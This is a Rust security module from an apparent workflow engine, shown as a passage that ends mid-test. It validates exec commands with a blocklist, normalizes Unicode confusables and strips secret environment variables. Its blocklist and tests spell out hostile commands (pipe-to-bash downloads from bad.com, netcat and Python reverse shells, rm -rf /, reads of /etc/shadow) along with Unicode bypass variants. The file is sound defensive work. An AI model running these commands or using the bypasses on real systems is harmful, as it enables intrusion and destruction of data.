Skip to main content

nika_engine/runtime/
security.rs

1//! Security Module - Command validation and blocklist
2//!
3//! Provides security validation for exec: commands:
4//! - Control character detection (blocks null bytes, escape sequences)
5//! - Blocklist for dangerous command patterns
6//! - Unicode NFKC normalization to prevent confusable bypass
7//! - Full validation combining both checks
8//!
9//! ## Unicode Confusable Protection
10//!
11//! Attackers may attempt to bypass the blocklist using Unicode confusables:
12//! - Fullwidth characters: `rm` vs `rm` (U+FF52, U+FF4D)
13//! - Math bold/italic: `sudo` vs `𝘀𝘂𝗱𝗼` (U+1D600 range)
14//! - Combining characters: `rm` with zero-width joiners
15//!
16//! NFKC (Compatibility Decomposition + Canonical Composition) normalizes
17//! these variants to their ASCII equivalents before blocklist checking.
18//!
19//! See ADR-TBD for security design decisions.
20
21use crate::error::NikaError;
22use unicode_normalization::UnicodeNormalization;
23
24/// Blocklist of dangerous command patterns (case-insensitive)
25///
26/// These patterns are checked against the lowercase command string.
27/// Any match results in a BlockedCommand error.
28const BLOCKLIST: &[&str] = &[
29    // Destructive file operations
30    "rm -rf /",
31    "rm -rf /*",
32    "rm -rf ~",
33    // Remote code execution (piping downloads to shell)
34    // Match the pipe-to-shell pattern, not specific commands
35    "| bash",
36    "|bash",
37    "| sh",
38    "|sh",
39    // Shell injection via dynamic execution
40    // Note: This blocks patterns that execute untrusted input
41    "eval ",
42    // Named pipes (can be used for reverse shells)
43    "mkfifo",
44    // Netcat reverse shell
45    "nc -e",
46    "nc -c",
47    "ncat -e",
48    "ncat -c",
49    // Chained destructive commands
50    "; rm ",
51    "&& rm ",
52    "| rm ",
53    // Fork bombs
54    ":(){ :|:& };:",
55    // Python reverse shell
56    "python -c \"import socket",
57    "python3 -c \"import socket",
58    // Privilege escalation
59    "sudo ",
60    "doas ",
61    "pkexec ",
62    // Dangerous permission changes
63    "chmod 777",
64    "chmod -r 777",
65    "chmod a+rwx",
66    // Base64 encoded payload execution
67    "base64 -d |",
68    "base64 --decode |",
69    "| base64 -d",
70    "| base64 --decode",
71    // Disk destruction
72    "dd if=",
73    // Destructive rm long-flag variants
74    "rm --recursive",
75    "rm --force",
76    // Interpreter bypass (arbitrary code execution via scripting runtimes)
77    "perl -e",
78    "ruby -e",
79    "node -e",
80    // Command wrapper bypass (env can prefix any blocked command)
81    "env ",
82    // Privilege escalation (su; sudo already covered above)
83    "su ",
84];
85
86/// Additional blocklist patterns that only apply in shell mode.
87///
88/// These patterns are dangerous only when executed via `sh -c` (shell mode).
89/// In shell-free mode (shlex), they are harmless literal strings.
90const SHELL_MODE_BLOCKLIST: &[&str] = &[
91    // Command substitution — executes arbitrary commands inside $()
92    "$(", // Backtick command substitution — legacy form of $()
93    "`",
94];
95
96/// Check command against shell-mode-specific blocklist.
97///
98/// These patterns (command substitution, backticks) are only dangerous
99/// when shell mode is active (`shell: true`). In shell-free mode,
100/// they are harmless literal characters.
101///
102/// # Errors
103///
104/// Returns `BlockedCommand` if a shell-mode blocklisted pattern is found.
105pub fn check_shell_mode_blocklist(cmd: &str) -> Result<(), NikaError> {
106    let normalized = normalize_for_blocklist(cmd);
107    let lower = normalized.to_lowercase();
108
109    for pattern in SHELL_MODE_BLOCKLIST {
110        if lower.contains(pattern) {
111            tracing::warn!(
112                command = %cmd,
113                normalized = %lower,
114                pattern = %pattern,
115                "NIKA-053: Blocked dangerous shell-mode pattern"
116            );
117            return Err(NikaError::BlockedCommand {
118                command: cmd.to_string(),
119                reason: format!("Shell-mode blocklisted pattern: {}", pattern),
120            });
121        }
122    }
123    Ok(())
124}
125
126/// Validate command string for control characters
127///
128/// Rejects control characters (0x00-0x1F) except:
129/// - `\n` (0x0A) - newline, allowed for multi-line commands
130/// - `\t` (0x09) - tab, allowed for indentation
131///
132/// # Errors
133///
134/// Returns `BlockedCommand` if a control character is found.
135pub fn validate_command_string(cmd: &str) -> Result<(), NikaError> {
136    for (i, c) in cmd.chars().enumerate() {
137        let code = c as u32;
138        // Reject 0x00-0x1F except \n (0x0A) and \t (0x09)
139        if code < 0x20 && code != 0x0A && code != 0x09 {
140            return Err(NikaError::BlockedCommand {
141                command: cmd.to_string(),
142                reason: format!("Control character 0x{:02X} at position {}", code, i),
143            });
144        }
145    }
146    Ok(())
147}
148
149/// Zero-width and invisible characters to strip before blocklist check.
150///
151/// These characters are invisible but can be used to break up keywords:
152/// - U+200B: Zero Width Space
153/// - U+200C: Zero Width Non-Joiner
154/// - U+200D: Zero Width Joiner
155/// - U+FEFF: Zero Width No-Break Space (BOM)
156/// - U+00AD: Soft Hyphen
157/// - U+2060: Word Joiner
158/// - U+180E: Mongolian Vowel Separator
159const ZERO_WIDTH_CHARS: &[char] = &[
160    '\u{200B}', // Zero Width Space
161    '\u{200C}', // Zero Width Non-Joiner
162    '\u{200D}', // Zero Width Joiner
163    '\u{FEFF}', // Zero Width No-Break Space (BOM)
164    '\u{00AD}', // Soft Hyphen
165    '\u{2060}', // Word Joiner
166    '\u{180E}', // Mongolian Vowel Separator
167];
168
169/// Normalize a string using NFKC for blocklist comparison.
170///
171/// This function performs two operations:
172/// 1. NFKC normalization (Compatibility Decomposition + Canonical Composition)
173///    - Fullwidth `rm` → `rm`
174///    - Math bold `𝐬𝐮𝐝𝐨` → `sudo`
175///    - Subscript/superscript variants → base characters
176///    - Ligatures (e.g., fi) → component characters
177///
178/// 2. Stripping of zero-width/invisible characters that NFKC preserves:
179///    - Zero Width Space (U+200B)
180///    - Zero Width Joiner (U+200D)
181///    - Zero Width Non-Joiner (U+200C)
182///    - Soft Hyphen (U+00AD)
183///
184/// This prevents attackers from bypassing the blocklist with visually
185/// similar but technically different Unicode characters, or by inserting
186/// invisible characters to break up blocked patterns.
187fn normalize_for_blocklist(s: &str) -> String {
188    s.nfkc()
189        .filter(|c| !ZERO_WIDTH_CHARS.contains(c))
190        .collect::<String>()
191        .split_whitespace()
192        .collect::<Vec<_>>()
193        .join(" ")
194}
195
196/// Check command against blocklist
197///
198/// Performs case-insensitive matching against the blocklist.
199/// Applies NFKC normalization to both the command and patterns
200/// to prevent Unicode confusable bypass attacks.
201///
202/// # Security
203///
204/// NFKC normalization ensures that:
205/// - `rm -rf /` (fullwidth) is blocked like `rm -rf /`
206/// - `𝘀𝘂𝗱𝗼 rm` (math bold) is blocked like `sudo rm`
207/// - Commands with combining characters are properly detected
208///
209/// # Errors
210///
211/// Returns `BlockedCommand` if a blocklisted pattern is found.
212pub fn check_blocklist(cmd: &str) -> Result<(), NikaError> {
213    // Normalize the command using NFKC to handle Unicode confusables
214    let normalized = normalize_for_blocklist(cmd);
215    let lower = normalized.to_lowercase();
216
217    for pattern in BLOCKLIST {
218        // Blocklist patterns are already clean ASCII — only lowercase them.
219        // Do NOT apply normalize_for_blocklist() which strips trailing spaces
220        // via split_whitespace(), breaking patterns like "su " and "env "
221        // that rely on a trailing space to avoid false positives
222        // (e.g. "su " must NOT match "successfully").
223        let normalized_pattern = pattern.to_lowercase();
224        if lower.contains(&normalized_pattern) {
225            tracing::warn!(
226                command = %cmd,
227                normalized = %lower,
228                pattern = %pattern,
229                "NIKA-053: Blocked dangerous command"
230            );
231            return Err(NikaError::BlockedCommand {
232                command: cmd.to_string(),
233                reason: format!("Blocklisted pattern: {}", pattern),
234            });
235        }
236    }
237    Ok(())
238}
239
240/// Blocked environment variable names (library injection / privilege escalation).
241///
242/// These variables allow injecting arbitrary shared libraries into child
243/// processes and must never be set from workflow YAML.
244const BLOCKED_ENV_VARS: &[&str] = &[
245    "LD_PRELOAD",
246    "LD_LIBRARY_PATH",
247    "DYLD_INSERT_LIBRARIES",
248    "DYLD_LIBRARY_PATH",
249    "DYLD_FRAMEWORK_PATH",
250    "LD_AUDIT",
251    "LD_PROFILE",
252];
253
254/// Validate environment variables for dangerous names.
255///
256/// Performs two checks:
257/// 1. Rejects env var names that don't match `^[A-Za-z_][A-Za-z0-9_]*$`.
258///    This prevents BASH_FUNC injection and other shell metacharacter abuse
259///    via crafted env var names (e.g., `BASH_FUNC_x%%`, `FOO=BAR`).
260/// 2. Rejects env vars that enable library injection or privilege escalation.
261///    Comparison is case-insensitive.
262///
263/// # Errors
264///
265/// Returns `BlockedCommand` if a blocked or invalid env var name is found.
266pub fn validate_env_vars(vars: &[(String, String)]) -> Result<(), NikaError> {
267    for (key, _) in vars {
268        // Validate env var name format: must be [A-Za-z_][A-Za-z0-9_]*
269        if !is_valid_env_var_name(key) {
270            return Err(NikaError::BlockedCommand {
271                command: format!("env: {}=...", key),
272                reason: format!(
273                    "Invalid environment variable name '{}': must match [A-Za-z_][A-Za-z0-9_]*",
274                    key
275                ),
276            });
277        }
278
279        let upper = key.to_uppercase();
280        for blocked in BLOCKED_ENV_VARS {
281            if upper == *blocked {
282                return Err(NikaError::BlockedCommand {
283                    command: format!("env: {}=...", key),
284                    reason: format!(
285                        "Blocked environment variable '{}': library injection risk",
286                        key
287                    ),
288                });
289            }
290        }
291    }
292    Ok(())
293}
294
295/// Check if an environment variable name is valid.
296///
297/// Valid names match `^[A-Za-z_][A-Za-z0-9_]*$` — the POSIX standard for
298/// environment variable names. This rejects names containing `%`, `{`, `}`,
299/// `(`, `)`, `=`, spaces, etc., which could be used for BASH_FUNC injection.
300fn is_valid_env_var_name(name: &str) -> bool {
301    if name.is_empty() {
302        return false;
303    }
304
305    let mut chars = name.chars();
306
307    // First character: must be [A-Za-z_]
308    match chars.next() {
309        Some(c) if c.is_ascii_alphabetic() || c == '_' => {}
310        _ => return false,
311    }
312
313    // Remaining characters: must be [A-Za-z0-9_]
314    chars.all(|c| c.is_ascii_alphanumeric() || c == '_')
315}
316
317/// Returns the list of sensitive env var names that should be stripped
318/// from child processes to prevent API key leakage.
319pub fn sensitive_env_vars() -> Vec<&'static str> {
320    // Collect from KNOWN_PROVIDERS
321    let mut vars: Vec<&'static str> = crate::core::providers::KNOWN_PROVIDERS
322        .iter()
323        .map(|p| p.env_var)
324        .collect();
325
326    // Common sensitive env vars beyond LLM providers
327    vars.extend_from_slice(&[
328        "AWS_SECRET_ACCESS_KEY",
329        "AWS_SESSION_TOKEN",
330        "DATABASE_URL",
331        "REDIS_URL",
332        "MONGO_URI",
333        "JWT_SECRET",
334        "SESSION_SECRET",
335        "GITHUB_TOKEN",
336        "GH_TOKEN",
337        "GITLAB_TOKEN",
338        "SLACK_TOKEN",
339        "SLACK_WEBHOOK_URL",
340        "STRIPE_SECRET_KEY",
341        "TWILIO_AUTH_TOKEN",
342        "SENDGRID_API_KEY",
343        "MAILGUN_API_KEY",
344        "SENTRY_DSN",
345        "DATADOG_API_KEY",
346        "PRIVATE_KEY",
347        "SECRET_KEY",
348        "ENCRYPTION_KEY",
349    ]);
350
351    // Sort and dedup to ensure consistent, duplicate-free output
352    vars.sort();
353    vars.dedup();
354    vars
355}
356
357/// Remove sensitive API key env vars from a Command before spawning.
358pub fn strip_sensitive_env_vars(cmd: &mut tokio::process::Command) {
359    for var in sensitive_env_vars() {
360        cmd.env_remove(var);
361    }
362}
363
364/// Full security validation for exec commands
365///
366/// Combines control character validation and blocklist checking.
367/// When `shell_mode` is true, also checks for shell-specific bypass
368/// patterns like command substitution (`$()`, backticks).
369///
370/// # Errors
371///
372/// Returns `BlockedCommand` if any security check fails.
373pub fn validate_exec_command(cmd: &str) -> Result<(), NikaError> {
374    validate_exec_command_with_shell(cmd, false)
375}
376
377/// Full security validation for exec commands with explicit shell mode flag.
378///
379/// When `shell_mode` is true, additionally blocks command substitution
380/// patterns (`$()`, backticks) that are only dangerous in shell mode.
381///
382/// # Errors
383///
384/// Returns `BlockedCommand` if any security check fails.
385pub fn validate_exec_command_with_shell(cmd: &str, shell_mode: bool) -> Result<(), NikaError> {
386    validate_command_string(cmd)?;
387    check_blocklist(cmd)?;
388    if shell_mode {
389        check_shell_mode_blocklist(cmd)?;
390    }
391    Ok(())
392}
393
394#[cfg(test)]
395mod tests {
396    use super::*;
397
398    // =========================================================================
399    // Control Character Tests
400    // =========================================================================
401
402    #[test]
403    fn test_validate_command_string_normal() {
404        assert!(validate_command_string("echo hello").is_ok());
405        assert!(validate_command_string("ls -la").is_ok());
406        assert!(validate_command_string("cargo build --release").is_ok());
407    }
408
409    #[test]
410    fn test_validate_command_string_allows_newline() {
411        assert!(validate_command_string("echo hello\necho world").is_ok());
412    }
413
414    #[test]
415    fn test_validate_command_string_allows_tab() {
416        assert!(validate_command_string("echo\thello").is_ok());
417    }
418
419    #[test]
420    fn test_validate_command_string_rejects_null_byte() {
421        let result = validate_command_string("echo\x00hello");
422        assert!(result.is_err());
423        let err = result.unwrap_err();
424        assert!(err.to_string().contains("NIKA-053"));
425        assert!(err.to_string().contains("0x00"));
426    }
427
428    #[test]
429    fn test_validate_command_string_rejects_escape() {
430        let result = validate_command_string("echo\x1bhello");
431        assert!(result.is_err());
432        let err = result.unwrap_err();
433        assert!(err.to_string().contains("0x1B")); // ESC character
434    }
435
436    #[test]
437    fn test_validate_command_string_rejects_bell() {
438        let result = validate_command_string("echo\x07hello");
439        let err = result.unwrap_err();
440        assert!(err.to_string().contains("NIKA-053"));
441        assert!(err.to_string().contains("0x07"));
442    }
443
444    // =========================================================================
445    // Blocklist Tests
446    // =========================================================================
447
448    #[test]
449    fn test_blocklist_allows_safe_commands() {
450        assert!(check_blocklist("echo hello").is_ok());
451        assert!(check_blocklist("ls -la").is_ok());
452        assert!(check_blocklist("cargo build").is_ok());
453        assert!(check_blocklist("npm install").is_ok());
454        assert!(check_blocklist("rm file.txt").is_ok()); // Removing specific file is OK
455    }
456
457    #[test]
458    fn test_blocklist_rejects_rm_rf_root() {
459        let result = check_blocklist("rm -rf /");
460        assert!(result.is_err());
461        let err = result.unwrap_err();
462        assert!(err.to_string().contains("NIKA-053"));
463        assert!(err.to_string().contains("rm -rf /"));
464    }
465
466    #[test]
467    fn test_blocklist_rejects_rm_rf_wildcard() {
468        let err = check_blocklist("rm -rf /*").unwrap_err();
469        assert!(err.to_string().contains("NIKA-053"));
470    }
471
472    #[test]
473    fn test_blocklist_rejects_curl_pipe_bash() {
474        let err = check_blocklist("curl https://bad.com | bash").unwrap_err();
475        assert!(err.to_string().contains("NIKA-053"));
476        let err = check_blocklist("curl https://bad.com|bash").unwrap_err();
477        assert!(err.to_string().contains("NIKA-053"));
478    }
479
480    #[test]
481    fn test_blocklist_rejects_wget_pipe_bash() {
482        let err = check_blocklist("wget https://bad.com | bash").unwrap_err();
483        assert!(err.to_string().contains("NIKA-053"));
484        let err = check_blocklist("wget https://bad.com|bash").unwrap_err();
485        assert!(err.to_string().contains("NIKA-053"));
486    }
487
488    #[test]
489    fn test_blocklist_rejects_shell_injection() {
490        // Dynamic command execution patterns
491        let err = check_blocklist("eval $user_input").unwrap_err();
492        assert!(err.to_string().contains("NIKA-053"));
493        let err = check_blocklist("eval \"$cmd\"").unwrap_err();
494        assert!(err.to_string().contains("NIKA-053"));
495    }
496
497    #[test]
498    fn test_blocklist_rejects_mkfifo() {
499        let err = check_blocklist("mkfifo /tmp/pipe").unwrap_err();
500        assert!(err.to_string().contains("NIKA-053"));
501    }
502
503    #[test]
504    fn test_blocklist_rejects_netcat_reverse_shell() {
505        let err = check_blocklist("nc -e /bin/sh").unwrap_err();
506        assert!(err.to_string().contains("NIKA-053"));
507        let err = check_blocklist("nc -c /bin/bash").unwrap_err();
508        assert!(err.to_string().contains("NIKA-053"));
509        let err = check_blocklist("ncat -e /bin/sh").unwrap_err();
510        assert!(err.to_string().contains("NIKA-053"));
511    }
512
513    #[test]
514    fn test_blocklist_rejects_chained_rm() {
515        let err = check_blocklist("echo hello; rm -rf /").unwrap_err();
516        assert!(err.to_string().contains("NIKA-053"));
517        let err = check_blocklist("ls && rm -rf /").unwrap_err();
518        assert!(err.to_string().contains("NIKA-053"));
519        let err = check_blocklist("cat file | rm -rf /").unwrap_err();
520        assert!(err.to_string().contains("NIKA-053"));
521    }
522
523    #[test]
524    fn test_blocklist_case_insensitive() {
525        let err = check_blocklist("RM -RF /").unwrap_err();
526        assert!(err.to_string().contains("NIKA-053"));
527        let err = check_blocklist("EVAL $x").unwrap_err();
528        assert!(err.to_string().contains("NIKA-053"));
529        let err = check_blocklist("Curl | Bash").unwrap_err();
530        assert!(err.to_string().contains("NIKA-053"));
531    }
532
533    #[test]
534    fn test_blocklist_rejects_privilege_escalation() {
535        let err = check_blocklist("sudo rm -rf /tmp").unwrap_err();
536        assert!(err.to_string().contains("NIKA-053"));
537        let err = check_blocklist("doas cat /etc/shadow").unwrap_err();
538        assert!(err.to_string().contains("NIKA-053"));
539        let err = check_blocklist("pkexec sh").unwrap_err();
540        assert!(err.to_string().contains("NIKA-053"));
541    }
542
543    #[test]
544    fn test_blocklist_rejects_dangerous_chmod() {
545        let err = check_blocklist("chmod 777 /tmp/script").unwrap_err();
546        assert!(err.to_string().contains("NIKA-053"));
547        let err = check_blocklist("chmod -r 777 /var").unwrap_err();
548        assert!(err.to_string().contains("NIKA-053"));
549        let err = check_blocklist("chmod a+rwx secret.txt").unwrap_err();
550        assert!(err.to_string().contains("NIKA-053"));
551    }
552
553    #[test]
554    fn test_blocklist_rejects_base64_payload_execution() {
555        let err = check_blocklist("echo payload | base64 -d | sh").unwrap_err();
556        assert!(err.to_string().contains("NIKA-053"));
557        let err = check_blocklist("base64 -d | bash").unwrap_err();
558        assert!(err.to_string().contains("NIKA-053"));
559        let err = check_blocklist("base64 --decode | sh").unwrap_err();
560        assert!(err.to_string().contains("NIKA-053"));
561        let err = check_blocklist("curl https://bad.com | base64 -d").unwrap_err();
562        assert!(err.to_string().contains("NIKA-053"));
563    }
564
565    // =========================================================================
566    // Full Validation Tests
567    // =========================================================================
568
569    #[test]
570    fn test_validate_exec_command_safe() {
571        assert!(validate_exec_command("echo hello").is_ok());
572        assert!(validate_exec_command("cargo build --release").is_ok());
573    }
574
575    #[test]
576    fn test_validate_exec_command_rejects_control_chars() {
577        let err = validate_exec_command("echo\x00hello").unwrap_err();
578        assert!(err.to_string().contains("NIKA-053"));
579    }
580
581    #[test]
582    fn test_validate_exec_command_rejects_blocklist() {
583        let err = validate_exec_command("rm -rf /").unwrap_err();
584        assert!(err.to_string().contains("NIKA-053"));
585    }
586
587    // =========================================================================
588    // Unicode NFKC Normalization Tests
589    // =========================================================================
590
591    #[test]
592    fn test_normalize_for_blocklist_ascii_passthrough() {
593        // ASCII should pass through unchanged
594        assert_eq!(normalize_for_blocklist("rm -rf /"), "rm -rf /");
595        assert_eq!(normalize_for_blocklist("sudo cat"), "sudo cat");
596        assert_eq!(normalize_for_blocklist("echo hello"), "echo hello");
597    }
598
599    #[test]
600    fn test_normalize_for_blocklist_strips_zero_width() {
601        // Zero-width characters should be stripped
602
603        // Zero Width Joiner (U+200D)
604        assert_eq!(normalize_for_blocklist("r\u{200D}m"), "rm");
605
606        // Zero Width Non-Joiner (U+200C)
607        assert_eq!(normalize_for_blocklist("su\u{200C}do"), "sudo");
608
609        // Zero Width Space (U+200B)
610        assert_eq!(normalize_for_blocklist("ev\u{200B}al"), "eval");
611
612        // Soft Hyphen (U+00AD)
613        assert_eq!(normalize_for_blocklist("mk\u{00AD}fifo"), "mkfifo");
614
615        // Multiple zero-width characters
616        assert_eq!(
617            normalize_for_blocklist("r\u{200D}m\u{200C} -rf /"),
618            "rm -rf /"
619        );
620    }
621
622    #[test]
623    fn test_normalize_for_blocklist_fullwidth() {
624        // Fullwidth Latin letters (U+FF00-U+FF5E range)
625        // These are commonly used in CJK contexts but can be used for obfuscation
626
627        // rm (U+FF52, U+FF4D) should normalize to "rm"
628        assert_eq!(normalize_for_blocklist("rm"), "rm");
629
630        // sudo (U+FF53, U+FF55, U+FF44, U+FF4F) should normalize to "sudo"
631        assert_eq!(normalize_for_blocklist("sudo"), "sudo");
632
633        // Full command with fullwidth characters
634        assert_eq!(normalize_for_blocklist("rm -rf /"), "rm -rf /");
635        assert_eq!(normalize_for_blocklist("sudo rm"), "sudo rm");
636    }
637
638    #[test]
639    fn test_normalize_for_blocklist_math_variants() {
640        // Mathematical Alphanumeric Symbols (U+1D400-U+1D7FF range)
641        // These are used for mathematical notation but can be abused
642        // Math bold lowercase starts at U+1D41A (a), so:
643        // s = U+1D41A + 18 = U+1D42C
644        // u = U+1D41A + 20 = U+1D42E
645        // d = U+1D41A + 3  = U+1D41D
646        // o = U+1D41A + 14 = U+1D428
647
648        // Math bold: 𝐬𝐮𝐝𝐨 should normalize to "sudo"
649        let math_bold_sudo = "\u{1D42C}\u{1D42E}\u{1D41D}\u{1D428}";
650        assert_eq!(normalize_for_blocklist(math_bold_sudo), "sudo");
651
652        // Math italic lowercase starts at U+1D44E (a), so:
653        // r = U+1D44E + 17 = U+1D45F
654        // m = U+1D44E + 12 = U+1D45A
655        let math_italic_rm = "\u{1D45F}\u{1D45A}";
656        assert_eq!(normalize_for_blocklist(math_italic_rm), "rm");
657
658        // Math bold: 𝐞𝐯𝐚𝐥 should normalize to "eval"
659        // e = U+1D41A + 4  = U+1D41E
660        // v = U+1D41A + 21 = U+1D42F
661        // a = U+1D41A + 0  = U+1D41A
662        // l = U+1D41A + 11 = U+1D425
663        let math_bold_eval = "\u{1D41E}\u{1D42F}\u{1D41A}\u{1D425}";
664        assert_eq!(normalize_for_blocklist(math_bold_eval), "eval");
665    }
666
667    #[test]
668    fn test_blocklist_rejects_fullwidth_bypass() {
669        // Attempt to bypass blocklist using fullwidth characters
670        // rm -rf / should be blocked like rm -rf /
671        let fullwidth_rm = "rm -rf /";
672        let result = check_blocklist(fullwidth_rm);
673        assert!(result.is_err(), "Fullwidth rm -rf / should be blocked");
674        let err = result.unwrap_err();
675        assert!(err.to_string().contains("NIKA-053"));
676
677        // sudo rm should be blocked like sudo rm
678        let fullwidth_sudo = "sudo rm -rf /tmp";
679        let result = check_blocklist(fullwidth_sudo);
680        assert!(result.is_err(), "Fullwidth sudo should be blocked");
681
682        // eval should be blocked like eval
683        let fullwidth_eval = "eval $user_input";
684        let result = check_blocklist(fullwidth_eval);
685        assert!(result.is_err(), "Fullwidth eval should be blocked");
686
687        // mkfifo should be blocked like mkfifo
688        let fullwidth_mkfifo = "mkfifo /tmp/pipe";
689        let result = check_blocklist(fullwidth_mkfifo);
690        assert!(result.is_err(), "Fullwidth mkfifo should be blocked");
691    }
692
693    #[test]
694    fn test_blocklist_rejects_math_bold_bypass() {
695        // Attempt to bypass blocklist using mathematical bold letters
696        // 𝐬𝐮𝐝𝐨 (math bold) should be blocked like sudo
697        let math_bold_sudo = "\u{1D42C}\u{1D42E}\u{1D41D}\u{1D428} rm -rf /tmp";
698        let result = check_blocklist(math_bold_sudo);
699        assert!(
700            result.is_err(),
701            "Math bold sudo should be blocked: {:?}",
702            result
703        );
704
705        // 𝐞𝐯𝐚𝐥 (math bold) should be blocked like eval
706        // v = U+1D41A + 21 = U+1D42F (not U+1D432)
707        let math_bold_eval = "\u{1D41E}\u{1D42F}\u{1D41A}\u{1D425} $cmd";
708        let result = check_blocklist(math_bold_eval);
709        assert!(
710            result.is_err(),
711            "Math bold eval should be blocked: {:?}",
712            result
713        );
714    }
715
716    #[test]
717    fn test_blocklist_rejects_math_italic_bypass() {
718        // Attempt to bypass blocklist using mathematical italic letters
719        // 𝑟𝑚 (math italic) should be blocked when part of rm -rf /
720        let math_italic_rm = "\u{1D45F}\u{1D45A} -rf /";
721        let result = check_blocklist(math_italic_rm);
722        assert!(
723            result.is_err(),
724            "Math italic rm -rf / should be blocked: {:?}",
725            result
726        );
727
728        // 𝑛𝑐 -e (math italic nc) should be blocked like nc -e
729        let math_italic_nc = "\u{1D45B}\u{1D450} -e /bin/sh";
730        let result = check_blocklist(math_italic_nc);
731        assert!(
732            result.is_err(),
733            "Math italic nc -e should be blocked: {:?}",
734            result
735        );
736    }
737
738    #[test]
739    fn test_blocklist_rejects_mixed_unicode_bypass() {
740        // Mix of fullwidth and regular ASCII
741        // rm -rf / (fullwidth r, regular m)
742        let mixed_rm = "rm -rf /";
743        let result = check_blocklist(mixed_rm);
744        assert!(result.is_err(), "Mixed Unicode rm should be blocked");
745
746        // sudo (regular su, fullwidth d, regular o)
747        let mixed_sudo = "sudo rm -rf /tmp";
748        let result = check_blocklist(mixed_sudo);
749        assert!(result.is_err(), "Mixed Unicode sudo should be blocked");
750    }
751
752    #[test]
753    fn test_blocklist_rejects_combining_characters_bypass() {
754        // Zero-width joiner (U+200D) should not affect detection
755        // r​m (with ZWJ between) - note: ZWJ is invisible
756        let zwj_rm = "r\u{200D}m -rf /";
757        // NFKC removes ZWJ, so this should be blocked
758        let result = check_blocklist(zwj_rm);
759        assert!(
760            result.is_err(),
761            "rm with zero-width joiner should be blocked: {:?}",
762            result
763        );
764
765        // Zero-width non-joiner (U+200C)
766        let zwnj_sudo = "su\u{200C}do rm -rf /tmp";
767        let result = check_blocklist(zwnj_sudo);
768        assert!(
769            result.is_err(),
770            "sudo with ZWNJ should be blocked: {:?}",
771            result
772        );
773    }
774
775    #[test]
776    fn test_blocklist_allows_legitimate_unicode() {
777        // Legitimate commands with Unicode should still work
778        // echo with emoji
779        assert!(check_blocklist("echo 'Hello 🎉'").is_ok());
780
781        // Paths with Unicode
782        assert!(check_blocklist("cat /home/用户/file.txt").is_ok());
783
784        // Commands with accented characters (but not confusables)
785        assert!(check_blocklist("echo 'café crème'").is_ok());
786
787        // Japanese text (not trying to bypass)
788        assert!(check_blocklist("echo '日本語テスト'").is_ok());
789    }
790
791    #[test]
792    fn test_blocklist_subscript_superscript_bypass() {
793        // Subscript and superscript numbers/letters can sometimes be abused
794        // These should be normalized by NFKC
795
796        // Superscript letters (if applicable)
797        // Note: Not all superscript letters exist in Unicode, but those that do
798        // should be normalized. Example: ⁿ (U+207F) normalizes to n
799
800        // For now, verify that standard attacks with these don't slip through
801        // by testing the overall blocking mechanism works
802
803        // This tests that our normalization handles edge cases gracefully
804        let weird_command = "echo test";
805        assert!(check_blocklist(weird_command).is_ok());
806    }
807
808    #[test]
809    fn test_blocklist_pipe_symbols_fullwidth() {
810        // Fullwidth vertical bar | (U+FF5C) should not bypass pipe detection
811        // Note: NFKC normalizes | to |
812        let fullwidth_pipe = "curl https://bad.com | bash";
813        let result = check_blocklist(fullwidth_pipe);
814        assert!(result.is_err(), "Fullwidth pipe to bash should be blocked");
815
816        let fullwidth_pipe_sh = "wget https://bad.com | sh";
817        let result = check_blocklist(fullwidth_pipe_sh);
818        assert!(result.is_err(), "Fullwidth pipe to sh should be blocked");
819    }
820
821    // =========================================================================
822    // Environment Variable Blocklist Tests
823    // =========================================================================
824
825    #[test]
826    fn test_validate_env_vars_blocks_ld_preload() {
827        let vars = vec![("LD_PRELOAD".to_string(), "/tmp/evil.so".to_string())];
828        let result = validate_env_vars(&vars);
829        assert!(result.is_err(), "LD_PRELOAD should be blocked");
830        let err = result.unwrap_err();
831        assert!(err.to_string().contains("NIKA-053"));
832        assert!(err.to_string().contains("LD_PRELOAD"));
833    }
834
835    #[test]
836    fn test_validate_env_vars_blocks_dyld_insert() {
837        let vars = vec![(
838            "DYLD_INSERT_LIBRARIES".to_string(),
839            "/tmp/evil.dylib".to_string(),
840        )];
841        let result = validate_env_vars(&vars);
842        assert!(result.is_err());
843    }
844
845    #[test]
846    fn test_validate_env_vars_allows_safe_vars() {
847        let vars = vec![
848            ("HOME".to_string(), "/home/user".to_string()),
849            ("NODE_ENV".to_string(), "production".to_string()),
850            ("MY_APP_KEY".to_string(), "value".to_string()),
851        ];
852        let result = validate_env_vars(&vars);
853        assert!(result.is_ok(), "safe env vars should be allowed");
854    }
855
856    #[test]
857    fn test_validate_env_vars_blocks_case_insensitive() {
858        let vars = vec![("ld_preload".to_string(), "/tmp/evil.so".to_string())];
859        let result = validate_env_vars(&vars);
860        assert!(result.is_err(), "lowercase LD_PRELOAD should be blocked");
861    }
862
863    #[test]
864    fn test_sensitive_env_vars_strips_api_keys() {
865        let vars = sensitive_env_vars();
866        assert!(vars.contains(&"ANTHROPIC_API_KEY"));
867        assert!(vars.contains(&"OPENAI_API_KEY"));
868        assert!(vars.contains(&"MISTRAL_API_KEY"));
869        assert!(!vars.contains(&"HOME"));
870    }
871
872    #[test]
873    fn test_validate_exec_command_with_unicode_bypass() {
874        // Full validation should catch Unicode bypass attempts
875        let fullwidth_rm = "rm -rf /";
876        assert!(
877            validate_exec_command(fullwidth_rm).is_err(),
878            "Full validation should block fullwidth rm"
879        );
880
881        let math_bold_sudo = "\u{1D42C}\u{1D42E}\u{1D41D}\u{1D428} rm";
882        assert!(
883            validate_exec_command(math_bold_sudo).is_err(),
884            "Full validation should block math bold sudo"
885        );
886    }
887
888    // =========================================================================
889    // Whitespace Normalization Bypass Tests
890    // =========================================================================
891
892    #[test]
893    fn test_blocklist_catches_double_spaces() {
894        // Double spaces between command tokens must be caught
895        assert!(
896            check_blocklist("rm  -rf  /").is_err(),
897            "Double spaces should not bypass blocklist"
898        );
899    }
900
901    #[test]
902    fn test_blocklist_catches_tabs_in_command() {
903        // Tab characters between command tokens must be caught
904        assert!(
905            check_blocklist("rm\t-rf\t/").is_err(),
906            "Tabs should not bypass blocklist"
907        );
908    }
909
910    #[test]
911    fn test_blocklist_catches_mixed_whitespace() {
912        // Mixed whitespace (spaces + tabs) must be caught
913        assert!(
914            check_blocklist("rm \t -rf \t /").is_err(),
915            "Mixed whitespace should not bypass blocklist"
916        );
917    }
918
919    #[test]
920    fn test_blocklist_catches_leading_trailing_spaces() {
921        // Leading/trailing whitespace must not bypass
922        assert!(
923            check_blocklist("  rm -rf /  ").is_err(),
924            "Leading/trailing spaces should not bypass blocklist"
925        );
926    }
927
928    #[test]
929    fn test_blocklist_catches_sudo_double_spaces() {
930        assert!(
931            check_blocklist("sudo  rm").is_err(),
